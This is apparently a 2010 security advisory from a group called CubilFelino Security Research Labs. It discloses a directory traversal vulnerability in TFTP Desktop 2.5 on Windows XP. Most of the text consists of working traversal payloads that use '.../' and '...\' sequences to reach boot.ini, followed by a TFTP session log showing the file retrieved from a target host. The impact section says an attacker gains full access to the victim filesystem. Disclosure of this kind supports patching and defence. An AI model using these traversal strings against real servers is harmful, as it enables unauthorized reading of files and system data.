+------------------------------------------------------------------------+ | .......| | ..''xxxxxxxxxxxxxxx'...| |..'xxxxxxxxxxxxxxxxxxxxxxxxxxx..| | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. | | .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. | | .'xxxxxxxxxxxxxxxxxxxxx''........... | |.xxxxxxxxxxxxxxxxxx'... .........'. | | 'xxxxxxxxxxxxxxx'......'.| |'xxxxxxxxxxxxxx'..'x...x. | | .xxxxxxxxxxxx'...'..... .' | | 'xxxxxxxxx'......x.| | xxxxxxx'...x.| | xxxx'.....xx.| | 'x'....'xxxxxxx'. x .x.| | .x'. .'xxxxxxxxxxxxxx. '' .' | |.xx..'xxxxxxxxxxxxxxxx. .'xx'''..'| | .xx..'xxxxxxxxxxxxxxxx'.'xxxxxxxxx''.| |.'xx'..'xxxxxxxxxxxxxxx...'xxxxxxxxxxxx'| |.xxx'..xxxxxxxxxxxx'..'xxxxxxxxxxxxxx'. | |.xxxx'.'xxxxxxxxx'.xxx'xxxxxxxxxx'. | |.'xxxxxxx'.......xxxxxxx'.| | ..'xxxxx'.. ..xxxxx'.. | |....'xx'.....''''...| || |CubilFelino Security Research Labs| |proudly presents... | +------------------------------------------------------------------------+ Author: chr1x (chr1x@sectester.net) Date: August 30, 2010 Affected operating system/software, including full version details TFTP Desktop version 2.5, Tested on Windows XP PRO SP3 Download: http://www.mynet2.com/soft/Software%20Archive/TFTP%20Server/tftp_desktop_free.exe How the vulnerability can be reproduced Attack strings below: [*] Testing Path: .../.../.../boot.ini<- Vulnerable string!! [*] Testing Path: .../.../.../.../boot.ini<- Vulnerable string!! [*] Testing Path: .../.../.../.../.../boot.ini<- Vulnerable string!! [*] Testing Path: .../.../.../.../.../.../boot.ini<- Vulnerable string!! [*] Testing Path: .../.../.../.../.../.../.../boot.ini<- Vulnerable string!! [*] Testing Path: .../.../.../.../.../.../.../.../boot.ini<- Vulnerable string!! [*] Testing Path: ...\...\...\boot.ini<- Vulnerable string!! [*] Testing Path: ...\...\...\...\boot.ini<- Vulnerable string!! [*] Testing Path: ...\...\...\...\...\boot.ini<- Vulnerable string!! [*] Testing Path: ...\...\...\...\...\...\boot.ini<- Vulnerable string!! [*] Testing Path: ...\...\...\...\...\...\...\boot.ini<- Vulnerable string!! [*] Testing Path: ...\...\...\...\...\...\...\...\boot.ini<- Vulnerable string!! Confirmation log: root@olovely:/# tftp tftp> connect (to) 192.168.1.53 tftp> ascii tftp> get (files) .../.../.../.../.../.../boot.ini Received 211 bytes in 0.0 seconds tftp> quit What impact the vulnerability has on the vulnerable system * High, since when exploiting the vulnerability the attacker is able to get full access to the victim filesystem.
体验盒子